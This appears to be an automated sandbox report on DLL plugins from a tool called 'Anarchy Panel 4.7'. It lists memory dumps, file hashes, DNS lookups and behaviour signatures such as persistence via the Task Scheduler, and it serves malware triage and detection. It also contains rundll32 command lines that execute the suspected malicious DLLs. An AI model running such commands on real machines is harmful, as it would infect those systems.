memory/4456-242-0x00007FFC485C0000-0x00007FFC4867E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2712-244-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2712-245-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/2712-246-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/588-256-0x000001EC30030000-0x000001EC30057000-memory.dmp

memory/676-257-0x00000248341B0000-0x00000248341D7000-memory.dmp

memory/588-262-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp

memory/588-259-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp

memory/588-252-0x000001EC30000000-0x000001EC30021000-memory.dmp

memory/316-265-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/952-271-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/436-276-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/436-274-0x00000236C7110000-0x00000236C7137000-memory.dmp

memory/676-273-0x00000248341B0000-0x00000248341D7000-memory.dmp

memory/676-275-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp

memory/4860-270-0x00007FF6D2890000-0x00007FF6D2E5C000-memory.dmp

memory/676-280-0x00007FFC4A4CC000-0x00007FFC4A4CD000-memory.dmp

memory/952-281-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp

memory/436-283-0x00000236C7110000-0x00000236C7137000-memory.dmp

memory/752-285-0x00000234621D0000-0x00000234621F7000-memory.dmp

memory/316-282-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/872-278-0x0000013EA7F90000-0x0000013EA7F93000-memory.dmp

memory/676-277-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp

memory/952-264-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp

memory/676-260-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/448-286-0x0000000002230000-0x0000000002630000-memory.dmp

memory/752-287-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/752-288-0x00000234621D0000-0x00000234621F7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7ce8cefc3f798abe5abd683d0ef26dd
SHA1 b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA256 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512 c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

memory/1064-293-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp

memory/1064-295-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1092-297-0x0000022C03060000-0x0000022C03087000-memory.dmp

memory/1092-299-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1104-303-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/1104-301-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp

memory/2712-305-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2712-306-0x00000227EC730000-0x00000227EC740000-memory.dmp

memory/588-308-0x000001EC30030000-0x000001EC30057000-memory.dmp

memory/316-315-0x00000214404D0000-0x00000214404F7000-memory.dmp

memory/448-319-0x0000000002230000-0x0000000002630000-memory.dmp

memory/316-314-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/4456-311-0x00007FF77D520000-0x00007FF77D549000-memory.dmp

memory/448-310-0x00000000030C0000-0x00000000030F6000-memory.dmp

memory/1180-321-0x00000220F8940000-0x00000220F8967000-memory.dmp

memory/2712-323-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/1180-326-0x00000220F8940000-0x00000220F8967000-memory.dmp

memory/1180-325-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp

memory/752-328-0x00000234621D0000-0x00000234621F7000-memory.dmp

memory/1064-329-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp

memory/1092-330-0x0000022C03060000-0x0000022C03087000-memory.dmp

memory/1104-331-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp

memory/1180-332-0x00000220F8940000-0x00000220F8967000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1769s

Max time network

1165s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 45.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1162s

Max time network

1168s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1755s

Max time network

1168s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Signatures

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C4C8BD77-D224-4F17-AF16-81DAE6FCD035}.catalogItem C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 126.211.247.8.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wsuA642.tmp

MD5 c01eaa0bdcd7c30a42bbb35a9acbf574
SHA1 0aee3e1b873e41d040f1991819d0027b6cc68f54
SHA256 32297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40
SHA512 d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 bb40fbc226480c508d39693d38cec38e
SHA1 1ad89427482d5bc0c6387978e89750501dc19d5e
SHA256 9e9312260b17484244827f311b8c074dafba75ac20f25ceb1eea66f9bd655bdf
SHA512 75693ab8db77a9c0059551580c32861fcd34f2b781ab31a0c9d02c768120208da76eb7ff09678d8b61448c88ccabc8068b0a8e0dbddefa3fb2dbe60e7c8e5b92

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 ae8533130073ebaf50cd79d27f827570
SHA1 2d5c8edbf1b3cfb885e7980539d873ccddbdc362
SHA256 f7aef9cf3cc6e5df4a314f2849eb968d2e901d1c7e483769301eebf95c560ff7
SHA512 ebfb0feee181f65db3baad2587cce08cb636ad84129ee3817e84f2dda3ec170c2f518fdaad6715a5fced93a8c594d5a7fb769794c5e35ef1ab96721beefa16f1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 3bb7dc9ed69a8ac25da1fb2610ddd87e
SHA1 e8f415cb45b0a1caf8e68283584d144bb89bb338
SHA256 6f08ce47a5b22664deade3e3bf9a95c1397a92594589d96988bc42000a981e1d
SHA512 f815c983e70664ad25df5800d8eec5bd7dbd3242bbf6c1fbd528be1f2307b4fdb23f3555d5780de295fd695856e2d7b86fe3e15df6a3f4eea7ef4d3493d8658e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 22c1f20184a4da88dbd761e83d4d3e75
SHA1 db09fa52db52d30153777f9c196f67225ad0522e
SHA256 f6ac35241be252a7991ecab9e0748a305824d4801a142544e92665d44b38b385
SHA512 5817ad83ffdfdea70298bfcb4b4f1b62e93b3616b1aeaca6113499840e8a39fd282517b3df75c1252e20cd81872f7bfc83ce14687d39677203770f860f7e3031

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 2fb50b37935e8bd968a846d82b8f8e83
SHA1 676e22e916700a50154e9dae56114330fb7664ac
SHA256 36230ac18b2e7c099b5a7ce6e66bec1aa20ba21742d66ff749151209b109c43e
SHA512 05e8ffc99dbfc76d45d0558e25b460e78c0d0c89cf0949f547c00f17befaeab8d19817cce93c3f7b138f44d285deea2e32fc2c1f57e7049f79424a52940be701

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 5f379394d1942441c8dd49d92e383c32
SHA1 cb03e7ce6157ec68c74c28e8bdce5ddb1bfa7a0b
SHA256 0947ee5c019f54bf3acfc735889e243b44ff26a3dad183761ae27fad667a6032
SHA512 6d234316a4dd1791ccf1ea164f48e8a904201d78747d6acd1a099cc0915dc30cf7adbe2a55c34c904ae3ff64c735eb2a6f19d165d6dcd36f7a3909cc29d6cd41

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 30b68dafb1e75a9f96b19a169d1bb9ec
SHA1 5ed22cd49f268842c97b948dfec259c73d5a7c9e
SHA256 9e43b701575950d829b81a0a7b74355e48ee0f8ca43d10cd77e9f4bd3fd167e0
SHA512 a7569c2d3c32b0b61a1d0e6fd6c8a94fd9f79ae4b7eed28bd883f694a78a329f68016a3e5f4d420ebe93bebf4d62f86aab7d3540aa1da4f641e56febfdf85463

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 e78be81225dbe7869c8353d426e10517
SHA1 58e39bf67bdf119411be4f97c211fcf8acb72322
SHA256 6cd370adf48e43e773a2f3b76ceae308796f46799e4275adc787612af166a8e4
SHA512 43e351193f9e0e6a35d9eb0080362de27ce53605b30eae28d23cbbb1b40c3b6da171532572da8000d37cdcbf4c09675638ff3da329d4ad220114bd74bcd5a61a

memory/1608-342-0x0000020323880000-0x0000020323890000-memory.dmp

memory/1608-361-0x0000020323980000-0x0000020323990000-memory.dmp

memory/1608-377-0x000002032BCF0000-0x000002032BCF1000-memory.dmp

memory/1608-379-0x000002032BD20000-0x000002032BD21000-memory.dmp

memory/1608-380-0x000002032BD20000-0x000002032BD21000-memory.dmp

memory/1608-381-0x000002032BE30000-0x000002032BE31000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 1e953c338201641935bd59debfd058fa
SHA1 f9ba7c3dd4ce5ba336c02a3181db38f7c05bbcff
SHA256 70d7514d42b7ef3850f276508f6cc77cb1958572e695d77dd27613a877dafb10
SHA512 d312255a2a530bbb8aec5d987bb86a0c68927273003ceb04c680b2bfba3183250140dd7595b9853ae96daff1cc1d034bfaa70819650eb3242d453bdadb940d09

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

MD5 db275cf78eed4bd3a7944879449fecc2
SHA1 fc2648932cebc6d370a57a497e402979b8ef3aaf
SHA256 629c58336b353b73ff9675ba87d8c6c13375f2b467dc799b4bd26e04789f8107
SHA512 f8e37f5fcbcf24400c6c617ad73c956b8270c462e103f52d9a4c2273ad5b9b77897fe0738dd54781914df9357aa382260dc48f2ff11a4f984e10b57ae891fe1b

Analysis: behavioral9

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1568s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1138s

Max time network

1146s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

709s

Max time network

1163s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

N/A